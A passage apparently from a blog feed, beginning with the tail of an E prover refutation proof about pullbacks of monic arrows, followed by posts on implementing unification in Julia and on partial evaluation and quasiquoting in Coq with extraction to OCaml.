inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[pullback_def])])])])])])).
fof(c_0_13, negated_conjecture, ((monic(esk11_0)&pullback(cod(esk11_0),esk11_0,esk12_0,esk13_0))&~monic(esk13_0)), inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[c_0_11])])])).
fof(c_0_14, plain, ![X58, X59, X60, X61, X63, X64, X65, X66, X67]:(((comp(X58,X59,esk6_4(X58,X59,X60,X61))|~commute_square(X58,X59,X60,X61))&(comp(X60,X61,esk6_4(X58,X59,X60,X61))|~commute_square(X58,X59,X60,X61)))&(~comp(X63,X64,X67)|~comp(X65,X66,X67)|commute_square(X63,X64,X65,X66))), inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[commute_square_def])])])])])])).
cnf(c_0_15, plain, (commute_square(X1,X2,X3,X4)|~pullback(X1,X3,X2,X4)), inference(split_conjunct,[status(thm)],[c_0_12])).
cnf(c_0_16, negated_conjecture, (pullback(cod(esk11_0),esk11_0,esk12_0,esk13_0)), inference(split_conjunct,[status(thm)],[c_0_13])).
fof(c_0_17, plain, ![X25, X26, X27, X28, X29]:((~comp(X25,X26,X27)|dom(X25)=cod(X26))&(dom(X28)!=cod(X29)|comp(X28,X29,esk1_2(X28,X29)))), inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_objects_middle])])])])])).
cnf(c_0_18, plain, (comp(X1,X2,esk6_4(X1,X2,X3,X4))|~commute_square(X1,X2,X3,X4)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_19, negated_conjecture, (commute_square(cod(esk11_0),esk12_0,esk11_0,esk13_0)), inference(spm,[status(thm)],[c_0_15, c_0_16])).
fof(c_0_20, plain, ![X19]:dom(cod(X19))=cod(X19), inference(variable_rename,[status(thm)],[dom_cod])).
fof(c_0_21, plain, ![X37]:comp(cod(X37),X37,X37), inference(variable_rename,[status(thm)],[left_id])).
cnf(c_0_22, plain, (dom(X1)=cod(X2)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_17])).
cnf(c_0_23, negated_conjecture, (comp(cod(esk11_0),esk12_0,esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0))), inference(spm,[status(thm)],[c_0_18, c_0_19])).
cnf(c_0_24, plain, (dom(cod(X1))=cod(X1)), inference(split_conjunct,[status(thm)],[c_0_20])).
fof(c_0_25, plain, ![X21, X22, X23, X24]:(~comp(X21,X22,X23)|~comp(X21,X22,X24)|X23=X24), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_is_unique])])).
cnf(c_0_26, plain, (comp(cod(X1),X1,X1)), inference(split_conjunct,[status(thm)],[c_0_21])).
cnf(c_0_27, negated_conjecture, (cod(esk12_0)=cod(esk11_0)), inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_22, c_0_23]), c_0_24])).
fof(c_0_28, plain, ![X46, X47, X48, X49, X50]:((~monic(X46)|(~comp(X46,X47,X49)|~comp(X46,X48,X49)|X47=X48))&(((comp(X50,esk2_1(X50),esk4_1(X50))|monic(X50))&(comp(X50,esk3_1(X50),esk4_1(X50))|monic(X50)))&(esk2_1(X50)!=esk3_1(X50)|monic(X50)))), inference(distribute,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(skolemize,[status(esa)],[inference(variable_rename,[status(thm)],[inference(shift_quantors,[status(thm)],[inference(fof_nnf,[status(thm)],[monic_def])])])])])])).
cnf(c_0_29, plain, (X3=X4|~comp(X1,X2,X3)|~comp(X1,X2,X4)), inference(split_conjunct,[status(thm)],[c_0_25])).
cnf(c_0_30, negated_conjecture, (comp(cod(esk11_0),esk12_0,esk12_0)), inference(spm,[status(thm)],[c_0_26, c_0_27])).
fof(c_0_31, plain, ![X34, X35, X36]:(~comp(X34,X35,X36)|cod(X34)=cod(X36)), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_cod])])).
cnf(c_0_32, negated_conjecture, (~monic(esk13_0)), inference(split_conjunct,[status(thm)],[c_0_13])).
cnf(c_0_33, plain, (comp(X1,esk2_1(X1),esk4_1(X1))|monic(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_34, plain, (comp(X1,X2,esk6_4(X3,X4,X1,X2))|~commute_square(X3,X4,X1,X2)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_35, plain, (comp(X1,esk3_1(X1),esk4_1(X1))|monic(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_36, negated_conjecture, (X1=esk12_0|~comp(cod(esk11_0),esk12_0,X1)), inference(spm,[status(thm)],[c_0_29, c_0_30])).
cnf(c_0_37, plain, (cod(X1)=cod(X3)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_31])).
cnf(c_0_38, negated_conjecture, (comp(esk13_0,esk2_1(esk13_0),esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_32, c_0_33])).
cnf(c_0_39, negated_conjecture, (comp(esk11_0,esk13_0,esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0))), inference(spm,[status(thm)],[c_0_34, c_0_19])).
cnf(c_0_40, negated_conjecture, (comp(esk13_0,esk3_1(esk13_0),esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_32, c_0_35])).
fof(c_0_41, plain, ![X31, X32, X33]:(~comp(X31,X32,X33)|dom(X32)=dom(X33)), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_dom])])).
cnf(c_0_42, negated_conjecture, (esk6_4(cod(esk11_0),esk12_0,esk11_0,esk13_0)=esk12_0), inference(spm,[status(thm)],[c_0_36, c_0_23])).
cnf(c_0_43, negated_conjecture, (cod(esk4_1(esk13_0))=cod(esk13_0)), inference(spm,[status(thm)],[c_0_37, c_0_38])).
cnf(c_0_44, negated_conjecture, (cod(esk13_0)=dom(esk11_0)), inference(spm,[status(thm)],[c_0_22, c_0_39])).
cnf(c_0_45, plain, (comp(X1,X2,esk1_2(X1,X2))|dom(X1)!=cod(X2)), inference(split_conjunct,[status(thm)],[c_0_17])).
cnf(c_0_46, negated_conjecture, (cod(esk3_1(esk13_0))=dom(esk13_0)), inference(spm,[status(thm)],[c_0_22, c_0_40])).
cnf(c_0_47, plain, (dom(X2)=dom(X3)|~comp(X1,X2,X3)), inference(split_conjunct,[status(thm)],[c_0_41])).
cnf(c_0_48, negated_conjecture, (comp(esk11_0,esk13_0,esk12_0)), inference(rw,[status(thm)],[c_0_39, c_0_42])).
cnf(c_0_49, negated_conjecture, (cod(esk4_1(esk13_0))=dom(esk11_0)), inference(rw,[status(thm)],[c_0_43, c_0_44])).
fof(c_0_50, plain, ![X39, X40, X41, X42, X43, X44, X45]:(~comp(X39,X40,X42)|~comp(X42,X41,X44)|~comp(X39,X43,X45)|~comp(X40,X41,X43)|X44=X45), inference(variable_rename,[status(thm)],[inference(fof_nnf,[status(thm)],[comp_assoc])])).
cnf(c_0_51, negated_conjecture, (comp(X1,esk3_1(esk13_0),esk1_2(X1,esk3_1(esk13_0)))|dom(X1)!=dom(esk13_0)), inference(spm,[status(thm)],[c_0_45, c_0_46])).
cnf(c_0_52, negated_conjecture, (dom(esk12_0)=dom(esk13_0)), inference(spm,[status(thm)],[c_0_47, c_0_48])).
cnf(c_0_53, negated_conjecture, (comp(X1,esk4_1(esk13_0),esk1_2(X1,esk4_1(esk13_0)))|dom(X1)!=dom(esk11_0)), inference(spm,[status(thm)],[c_0_45, c_0_49])).
cnf(c_0_54, plain, (X5=X7|~comp(X1,X2,X3)|~comp(X3,X4,X5)|~comp(X1,X6,X7)|~comp(X2,X4,X6)), inference(split_conjunct,[status(thm)],[c_0_50])).
cnf(c_0_55, negated_conjecture, (comp(esk12_0,esk3_1(esk13_0),esk1_2(esk12_0,esk3_1(esk13_0)))), inference(spm,[status(thm)],[c_0_51, c_0_52])).
cnf(c_0_56, negated_conjecture, (cod(esk2_1(esk13_0))=dom(esk13_0)), inference(spm,[status(thm)],[c_0_22, c_0_38])).
cnf(c_0_57, plain, (commute_square(X1,X2,X4,X5)|~comp(X1,X2,X3)|~comp(X4,X5,X3)), inference(split_conjunct,[status(thm)],[c_0_14])).
cnf(c_0_58, negated_conjecture, (comp(esk11_0,esk4_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(er,[status(thm)],[c_0_53])).
cnf(c_0_59, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=X1|~comp(X2,esk3_1(esk13_0),X3)|~comp(X4,X2,esk12_0)|~comp(X4,X3,X1)), inference(spm,[status(thm)],[c_0_54, c_0_55])).
cnf(c_0_60, negated_conjecture, (comp(X1,esk2_1(esk13_0),esk1_2(X1,esk2_1(esk13_0)))|dom(X1)!=dom(esk13_0)), inference(spm,[status(thm)],[c_0_45, c_0_56])).
cnf(c_0_61, plain, (X2=esk7_6(X6,X7,X1,X4,X3,X5)|~comp(X1,X2,X3)|~comp(X4,X2,X5)|~commute_square(X6,X3,X7,X5)|~pullback(X6,X7,X1,X4)), inference(split_conjunct,[status(thm)],[c_0_12])).
cnf(c_0_62, negated_conjecture, (commute_square(X1,X2,esk11_0,esk4_1(esk13_0))|~comp(X1,X2,esk1_2(esk11_0,esk4_1(esk13_0)))), inference(spm,[status(thm)],[c_0_57, c_0_58])).
cnf(c_0_63, negated_conjecture, (cod(esk1_2(esk11_0,esk4_1(esk13_0)))=cod(esk11_0)), inference(spm,[status(thm)],[c_0_37, c_0_58])).
cnf(c_0_64, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))|~comp(X1,esk3_1(esk13_0),esk4_1(esk13_0))|~comp(esk11_0,X1,esk12_0)), inference(spm,[status(thm)],[c_0_59, c_0_58])).
cnf(c_0_65, negated_conjecture, (comp(esk12_0,esk2_1(esk13_0),esk1_2(esk12_0,esk2_1(esk13_0)))), inference(spm,[status(thm)],[c_0_60, c_0_52])).
cnf(c_0_66, negated_conjecture, (X1=esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,X2,X3)|~commute_square(cod(esk11_0),X2,esk11_0,X3)|~comp(esk13_0,X1,X3)|~comp(esk12_0,X1,X2)), inference(spm,[status(thm)],[c_0_61, c_0_16])).
cnf(c_0_67, negated_conjecture, (commute_square(cod(esk11_0),esk1_2(esk11_0,esk4_1(esk13_0)),esk11_0,esk4_1(esk13_0))), inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_62, c_0_26]), c_0_63])).
cnf(c_0_68, negated_conjecture, (esk1_2(esk12_0,esk3_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_64, c_0_48]), c_0_40])])).
cnf(c_0_69, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=X1|~comp(X2,esk2_1(esk13_0),X3)|~comp(X4,X2,esk12_0)|~comp(X4,X3,X1)), inference(spm,[status(thm)],[c_0_54, c_0_65])).
cnf(c_0_70, negated_conjecture, (X1=esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,esk1_2(esk11_0,esk4_1(esk13_0)),esk4_1(esk13_0))|~comp(esk12_0,X1,esk1_2(esk11_0,esk4_1(esk13_0)))|~comp(esk13_0,X1,esk4_1(esk13_0))), inference(spm,[status(thm)],[c_0_66, c_0_67])).
cnf(c_0_71, negated_conjecture, (comp(esk12_0,esk3_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(rw,[status(thm)],[c_0_55, c_0_68])).
cnf(c_0_72, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))|~comp(X1,esk2_1(esk13_0),esk4_1(esk13_0))|~comp(esk11_0,X1,esk12_0)), inference(spm,[status(thm)],[c_0_69, c_0_58])).
cnf(c_0_73, negated_conjecture, (esk7_6(cod(esk11_0),esk11_0,esk12_0,esk13_0,esk1_2(esk11_0,esk4_1(esk13_0)),esk4_1(esk13_0))=esk3_1(esk13_0)), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_70, c_0_40]), c_0_71])])).
cnf(c_0_74, negated_conjecture, (esk1_2(esk12_0,esk2_1(esk13_0))=esk1_2(esk11_0,esk4_1(esk13_0))), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_72, c_0_48]), c_0_38])])).
cnf(c_0_75, negated_conjecture, (X1=esk3_1(esk13_0)|~comp(esk12_0,X1,esk1_2(esk11_0,esk4_1(esk13_0)))|~comp(esk13_0,X1,esk4_1(esk13_0))), inference(rw,[status(thm)],[c_0_70, c_0_73])).
cnf(c_0_76, negated_conjecture, (comp(esk12_0,esk2_1(esk13_0),esk1_2(esk11_0,esk4_1(esk13_0)))), inference(rw,[status(thm)],[c_0_65, c_0_74])).
cnf(c_0_77, plain, (monic(X1)|esk2_1(X1)!=esk3_1(X1)), inference(split_conjunct,[status(thm)],[c_0_28])).
cnf(c_0_78, negated_conjecture, (esk3_1(esk13_0)=esk2_1(esk13_0)), inference(cn,[status(thm)],[inference(rw,[status(thm)],[inference(spm,[status(thm)],[c_0_75, c_0_38]), c_0_76])])).
cnf(c_0_79, negated_conjecture, ($false), inference(sr,[status(thm)],[inference(spm,[status(thm)],[c_0_77, c_0_78]), c_0_32]), ['proof']).
# SZS output end CNFRefutation
# Proof object total steps : 80
# Proof object clause steps : 57
# Proof object formula steps : 23
# Proof object conjectures : 44
# Proof object clause conjectures : 41
# Proof object formula conjectures : 3
# Proof object initial clauses used : 18
# Proof object initial formulas used : 11
# Proof object generating inferences : 34
# Proof object simplifying inferences : 16
# Training examples: 0 positive, 0 negative
# Parsed axioms : 14
# Removed by relevancy pruning/SinE : 0
# Initial clauses : 31
# Removed in clause preprocessing : 0
# Initial clauses in saturation : 31
# Processed clauses : 4871
# ...of these trivial : 248
# ...subsumed : 2833
# ...remaining for further processing : 1790
# Other redundant clauses eliminated : 2
# Clauses deleted for lack of memory : 0
# Backward-subsumed : 68
# Backward-rewritten : 917
# Generated clauses : 12894
# ...of the previous two non-trivial : 12112
# Contextual simplify-reflections : 0
# Paramodulations : 12870
# Factorizations : 0
# Equation resolutions : 24
# Propositional unsat checks : 0
# Propositional check models : 0
# Propositional check unsatisfiable : 0
# Propositional clauses : 0
# Propositional clauses after purity: 0
# Propositional unsat core size : 0
# Propositional preprocessing time : 0.000
# Propositional encoding time : 0.000
# Propositional solver time : 0.000
# Success case prop preproc time : 0.000
# Success case prop encoding time : 0.000
# Success case prop solver time : 0.000
# Current number of processed clauses : 772
# Positive orientable unit clauses : 155
# Positive unorientable unit clauses: 0
# Negative unit clauses : 1
# Non-unit-clauses : 616
# Current number of unprocessed clauses: 5468
# ...number of literals in the above : 16715
# Current number of archived formulas : 0
# Current number of archived clauses : 1016
# Clause-clause subsumption calls (NU) : 303883
# Rec. Clause-clause subsumption calls : 253866
# Non-unit clause-clause subsumptions : 2890
# Unit Clause-clause subsumption calls : 1530
# Rewrite failures with RHS unbound : 0
# BW rewrite match attempts : 1110
# BW rewrite match successes : 80
# Condensation attempts : 0
# Condensation successes : 0
# Termbank termtop insertions : 267453
```

]]>It is a sister to pattern matching, but it has an intrinsic bidirectional flavor that makes it feel more powerful and declarative.

Unification can be implemented efficiently (not that I have done so yet) with some interesting variants of the disjoint set / union-find data type.

- The magic of Prolog is basically built in unification + backtracking search.
- The magic of polymorphic type inference in Haskell and OCaml comes from unification of type variables.
- Part of magic of SMT solvers using the theory of uninterpreted functions is unification.
- Automatic and Interactive Theorem provers have unification built in somewhere.

To describe terms I made a simple data types for variables modelled of those in SymbolicUtils (I probably should just *use* the definitions in SymbolicUtils but i was trying to keep it simple).

```
#variables
struct Sym
name::Symbol
end
struct Term
f::Symbol
arguments::Array{Any} # Array{Union{Term,Sym}} faster/better?
end
```

The implementation by Norvig and Russell for the their AI book is an often copied simple implementation of unification. It is small and kind of straightforward. You travel down the syntax trees and when you hit variables you try to put them into your substitution dictionary. Although, like anything that touches substitution, it can be easy to get wrong. See his note below.

I used the multiple dispatch as a kind of pattern matching on algebraic data types whether the variables are terms or variables. It’s kind of nice, but unclear to me whether obscenely slow or not. This is not a high performance implementation of unification in any case.

```
occur_check(x::Sym,y::Term,s) = any(occur_check(x, a, s) for a in y.arguments)
function occur_check(x::Sym,y::Sym,s)
if x == y
return s
elseif haskey(s,y)
return occur_check(x, s[y], s)
else
return nothing
end
end
function unify(x::Sym, y::Union{Sym,Term}, s)
if x == y
return s
elseif haskey(s,x)
return unify(s[x], y, s)
elseif haskey(s,y) # This is the norvig twist
return unify(x, s[y], s)
elseif occur_check(x,y,s)
return nothing
else
s[x] = y
return s
end
end
unify(x::Term, y::Sym, s) = unify(y,x,s)
function unify(x :: Term, y :: Term, s)
if x.f == y.f && length(x.arguments) == length(y.arguments)
for (x1, y1) in zip(x.arguments, y.arguments)
if unify(x1,y1,s) == nothing
return nothing
end
end
return s
else
return nothing
end
end
unify(x,y) = unify(x,y,Dict())
```

I also made a small macro function for converting simple julia expressions to my representation. It uses the prolog convention that capital letter starting names are variables.

```
function string2term(x)
if x isa Symbol
name = String(x)
if isuppercase(name[1])
return Sym( x)
else
return Term( x, [] )
end
elseif x isa Expr
@assert(x.head == :call)
arguments = [string2term(y) for y in x.args[2:end] ]
return Term( x.args[1], arguments )
end
end
macro string2term(x)
return :( $(string2term(x)) )
end
print(unify( @string2term(p(X,g(a), f(a, f(a)))) , @string2term(p(f(a), g(Y), f(Y, Z)))))
# Dict{Any,Any}(Sym(:X) => Term(:f, Any[Term(:a, Any[])]),Sym(:Y) => Term(:a, Any[]),Sym(:Z) => Term(:f, Any[Term(:a, Any[])]))
```

Unification: Multidisciplinary Survey by Knight https://kevincrawfordknight.github.io/papers/unification-knight.pdf

https://github.com/roberthoenig/FirstOrderLogic.jl/tree/master/src A julia project for first order logic that also has a unification implementation, and other stuff

An interesting category theoretic perspective on unification http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.48.3615 what is unification by Goguen

There is also a slightly hidden implementation in sympy (it does not appear in the docs?) http://matthewrocklin.com/blog/work/2012/11/01/Unification https://github.com/sympy/sympy/tree/master/sympy/unify

PyRes https://github.com/eprover/PyRes/blob/master/unification.py

Norvig unify

https://github.com/aimacode/aima-python/blob/9ea91c1d3a644fdb007e8dd0870202dcd9d078b6/logic4e.py#L1307

norvig – widespread error

http://norvig.com/unify-bug.pdf

Efficient unification note

ftp://ftp.cs.indiana.edu/pub/techreports/TR242.pdf

blog post

https://eli.thegreenplace.net/2018/unification/

Efficient representations for triangular substitituions

https://users.soe.ucsc.edu/~lkuper/papers/walk.pdf

conor mcbride – first order substitition structurly recursive dependent types

http://citeseerx.ist.psu.edu/viewdoc/download;jsessionid=880725E316FA5E3540EFAD83C0C2FD88?doi=10.1.1.25.1516&rep=rep1&type=pdf

z3 unifier – an example of an actually performant unifier

https://github.com/Z3Prover/z3/blob/520ce9a5ee6079651580b6d83bc2db0f342b8a20/src/ast/substitution/unifier.cpp

Warren Abstract Machine Tutorial Reconstruction http://wambook.sourceforge.net/wambook.pdf

Handbook of Automated Reasoning – has a chapter on unification

Higher Order Unification – LambdaProlog, Miller unification

Syntax trees with variables in them are a way in which to represent sets of terms (possibly infinite sets!). In that sense it asks can we form the union or intersection of these sets. The intersection is the most general unifier. The union is not expressible via a single term with variables in general. We can only over approximate it, like how the union of convex sets is not necessarily convex, however it’s hull is. This is a join on a term lattice. This is the process of anti-unification.

What about the complement of these sets? Not really. Not with the representation we’ve chosen, we can’t have an interesting negation. What about the difference of two sets?

I had an idea a while back about programming with relations, where I laid out some interesting combinators. I represented only finite relations, as those can be easily enumerated.

]]>If one chooses to ignore the proof aspects of Coq for a moment, it becomes a bizarre Ocaml metaprogramming system on insane steroids. Coq has very powerful evaluation mechanisms built in. Why not use these to perform partial evaluation?

We had a really fun project at work where we did partial evaluation in Coq and I’ve been tinkering around with how to make the techniques we eventually stumbled onto there less ad hoc feeling.

A problem I encountered is that it is somewhat difficult to get controlled evaluation in Coq. The fastest evaluation tactics vm_compute and native_compute do not let you protect values from unfolding. There is a construct that is protected though. Axioms added to Coq cannot be unfolded by construction, but can be extracted. So I think a useful mantra here is axioms ~ code.

```
Require Import Extraction.
Axiom PCode : Type -> Type.
Extract Constant PCode "'a" => "'a".
Axiom block : forall {a : Type}, a -> PCode a.
Extract Inlined Constant block => "".
```

It is useful to mark what things you expect to run and which you expect to block execution in the type. You can mark everything that is opaque with a type `PCode`

. `block`

is a useful combinator. It is *not* a `quote`

combinator however, as it will allow evaluation underneath of it. Nothing however will be able to inspect a blocked piece of code. It’s amusing that the blocking of computation of axioms is exactly what people dislike, but here it is the feature we desire. PCode is short for partial code indicating that it is possible for evaluation to occur within it. We’ll see a `Code`

that is more similar to MetaOcaml’s later.

It is a touch fishy to extract `block`

as nothing `""`

rather than an identity function `(fun x -> x)`

. It is rather cute though, and I suspect that you won’t find `block`

occurring in a higher order context although I could easily be wrong (ahhh the sweet dark freedom of ignoring correctness). If this makes you queasy, you can put the function in, which is likely to compiled away, especially if you use the flambda switch. Not as pretty an output though.

We can play a similar extraction game with two HOAS-ish combinators.

```
Axiom ocaml_lam : forall {a b: Type}, (PCode a -> PCode b) -> PCode (a -> b).
Extract Inlined Constant ocaml_lam => "".
Axiom ocaml_app : forall {a b : Type}, PCode (a -> b) -> PCode a -> PCode b.
Extract Inlined Constant ocaml_app => "".
```

Here are some examples of other primitives we might add. The extra imports makes extraction turn nat into the native Ocaml int type, which is nice. It is not made so clear in the Coq manual that you should use these libraries to get good extraction of some standard types (perhaps I missed it or should make a pull request). You can find the full set of such things here: https://github.com/coq/coq/tree/master/theories/extraction

```
From Coq.extraction Require Import ExtrOcamlBasic ExtrOcamlNatInt.
Axiom ocaml_add : PCode nat -> PCode nat -> PCode nat.
Extract Inlined Constant ocaml_add => "(+)".
Axiom ocaml_mul : PCode nat -> PCode nat -> PCode nat.
Extract Inlined Constant ocaml_mul => "(*)".
```

If we had instead used the Coq definition of `nat`

addition, it wouldn’t be protected during `vm_compute`

, even if we wrapped it in `block`

. It would unfold plus into it’s recursive definition, which is not what you want for extraction. We want to extract (+) to native ocaml (+).

You can add in other primitives as you see fit. Some things can get by merely using `block`

, such as lifting literals.

Here is a very simplistic unrolling of a power function with a compile time known exponent, following Kiselyov’s lead.

```
Fixpoint pow1 (n : nat) (x : PCode nat) : PCode nat :=
match n with
| O => block 1
| S O => x
| S n' => ocaml_mul x (pow1 n' x)
end.
Definition pow2 (n : nat) : PCode (nat -> nat) := ocaml_lam (fun x => pow1 n x).
Definition compilepow : PCode (nat -> nat) := Eval native_compute in pow2 4.
Extraction compilepow.
(*
(** val compilepow : (int -> int) pCode **)
let compilepow =
(fun x -> (*) x ((*) x ((*) x x)))
*)
```

What about if you want a quasiquoting interface though? Well here is one suggestion. The same code should become either PCode or more ordinary Coq values depending on whether you decide to quote it or not. So you want overloadable syntax. This can be achieved via a typeclass.

```
(* No, I don't really know what Symantics means. Symbolic semantics? It's an Oleg-ism.
*)
Class Symantics (repr : Type -> Type) :=
{
lnat : nat -> repr nat;
lbool : bool -> repr bool;
lam : forall {a b}, (repr a -> repr b) -> repr (a -> b);
app : forall {a b}, repr (a -> b) -> repr a -> repr b;
add : repr nat -> repr nat -> repr nat;
mul : repr nat -> repr nat -> repr nat
}.
```

```
(* A simple do nothing newtype wrapper for the typeclass *)
Record R a := { unR : a }.
Arguments Build_R {a}.
Arguments unR {a}.
(* Would Definition R (a:Type) := a. be okay? *)
Instance regularsym : Symantics R :=
{|
lnat := Build_R;
lbool := Build_R;
lam := fun a b f => Build_R (fun x => unR (f (Build_R (a:= a) x)));
app := fun _ _ f x => Build_R ((unR f) (unR x));
add := fun x y => Build_R ((unR x) + (unR y));
mul := fun x y => Build_R ((unR x) * (unR y));
|}.
Instance codesym : Symantics PCode :=
{|
lnat := block;
lbool := block;
lam := fun a b => ocaml_lam (a := a) (b := b);
app := fun a b => ocaml_app (a := a) (b := b);
add := ocaml_add;
mul := ocaml_mul
|}.
```

Now we’ve overloaded the meaning of the base combinators. The type `PCode`

vs `R`

labels which “mode” of evaluation we’re in, “mode” being which typeclass instance we’re using. Here are two combinators for quasiquoting that were somewhat surprising to me, but so far seem to be working. `quote`

takes a value of type `a`

being evaluated in “`Code`

mode” and makes it a value of type `Code a`

being evaluated in “`R`

mode”. And `splice`

sort of undoes that. I would have used the MetaOcaml syntax, but using periods in the notation seemed to make coq not happy.

```
Definition Code : Type -> Type := fun a => R (PCode a).
Definition quote {a} : PCode a -> Code a := Build_R.
Definition splice {a} : Code a -> PCode a := unR.
Declare Scope quote_scope.
Notation "<' x '>" := (quote x) : quote_scope.
Notation "<, x ,>" := (splice x) : quote_scope.
Notation "n + m" := (add n m) : quote_scope.
Notation "n * m" := (mul n m) : quote_scope.
```

Now you can take the same version of code, add quote/splice annotations and get a partially evaluated version. The thing doesn’t type check if you don’t add the appropriate annotations.

```
Open Scope quote_scope.
Fixpoint pow1' (n : nat) (x : Code nat) : Code nat :=
match n with
| O => quote (lnat 1)
| S O => x
| S n' => <' <, x ,> * <, pow1' n' x ,> '>
end.
Definition pow2' (n : nat) : Code (nat -> nat) := <' lam (fun x => <, pow1' n <' x '> ,> ) '>.
Definition compilepow' : Code (nat -> nat) := Eval native_compute in pow2' 4.
Extraction compilepow'.
(* Same as before basically.
(** val compilepow' : (int -> int) code **)
let compilepow' =
(fun x -> (*) x ((*) x ((*) x x)))
*)
```

Coolio.

With more elbow grease is this actually workable? Do we actually save anything over explicit language modelling with data types? Are things actually hygienic and playing nice? Not sure.

We could also give notations to `lam`

and the other combinators. Idiom brackets https://wiki.haskell.org/Idiom_brackets might be nice for `app`

. I am a little queasy going overboard on notation. I generally speaking hate it when people do stuff like this.

Monad have something to do with partial evaluation. Moggi’s original paper on monads seems to have partial evaluation in mind.

```
(* This is moggi's let. *)
Axiom ocaml_bind : forall {a b}, PCode a -> (a -> PCode b) -> PCode b.
Extract Inlined Constant ocaml_bind => "(fun x f -> f x)".
```

Doing fix: playing nice with Coq’s fix restrictions is going to be a pain. Maybe just gas it up?

`match`

statements might also suck to do in a dsl of the shown style. I supposed you’ll have to deal with everything via typeclass dispatched recursors / pattern matchers. Maybe one notation per data type? Or mostly stick to if then else and booleans.

Quote and splice can also be overloaded with another typeclass such that they just interpret completely into R or the appropriate purely functionally defined Gallina monad to emulate the appropriate effects of interest. This would be helpful for verification and development purposes as then the entire code can be proved with and evaluated in Coq.

Extracting arrays, mutable refs, for loops. All seems possible with some small inlined indirections that hopefully compile away. I’ve been finding godbolt.org interesting to look at to see what flambda can and can’t do.

Do I need to explcitly model a World token or an IO monad or is the Code paradigm already sufficiently careful about order of operations and such?

Some snippets

```
Extract Constant ref "'a" => "'a ref".
(* make_ref => "ref*)
Axiom get_ref : forall a, ref a -> World -> a * World.
Extract Constant get_ref => "fun r _ -> (!r ,())".
Axiom set_ref : forall a, ref a -> a -> World -> unit * World.
Extract Constant set_ref => "fun r x _ -> let () = r := x in (() , ())".
Axiom Array : Type -> Type.
Extract Constant Array "'a" => "'a array".
Axiom make : forall {a : Type}, Code nat -> Code a -> Code World -> Code (Array a * World).
Extract Constant make => "fun i def _ -> ( make i def , ())".
Axiom get : forall a, Array a -> nat -> World -> a * World.
Extract Constant get => "fun r i _ -> (r.(i) ,())".
Axiom set : forall a, Array a -> nat -> a -> World -> unit * World.
Extract Constant set => "fun r i x _ -> let () = r.(i) <- x in (() , ())".
```

MetaOCaml is super cool. The quote splice way of building of the exact expressions you want feels nice and having the type system differentiate between Code and static values is very useful conceptually. It’s another instance where I feel like the types really aid the design process and clarify thinking. The types give you a compile time guarantee of what will and won’t happen.

There are other systems that do compile time stuff. Types themselves are compile time. Some languages have const types, which is pretty similar. Templates are also code generators. Macros.

Why Coq vs metaocaml?

- MetaOcaml doesn’t have critical mass. Its ocaml switch lags behind the mainline. Coq seems more actively developed.
- Possible verification and more powerful types (at your peril. Some may not extract nice)
- One can go beyond purely generative metaprogamming since Ltac (and other techniques) can inspect terms.
- Typeclasses
- Can target more platforms. Haskell, Scheme, possibly C, fpgas?

However, Metaocaml does present a much more ergonomic, consistent, well founded interface for what it does.

One needs to have some protected structure in coq that represents a syntax tree of your intended ocaml expression. One natural choice would be a data type to represent this AST.

You also want access to possibly impure abilities of ocaml like mutation, errors, loops, arrays, and unbounded recursion that don’t have direct equivalents in base Gallina. You can model the purely functional versions of these things, but you don’t persay want to extract the purely functional versions if you’re seeking the ultimate speed.

Why Finally Tagless Style. Anything you can do finally taglessly you can do in initial style.

- Positivity restrictions make some things difficult to express in Coq data types. You can turn these restrictions off, at your peril. Raw axiomatic fixpoints and HOAS without PHOAS become easier
- Ultimately we need to build both a data type and an interpreter. A little bit using finally tagless cuts out the middle man. Why have a whole extra set of things to write?
- Finally tagless style is open. You can add new capabilities without having to rewrite everything everywhere

Downsides

- More confusing
- Optimizations are harder
- Is the verification story shot?

I guess ultimately there might not be a great reason. I just wandered into it. I was doing Kiselyov stuff, so other Kiselyov stuff was on the brain. I could make a DSL with Quote and Splice constructors.

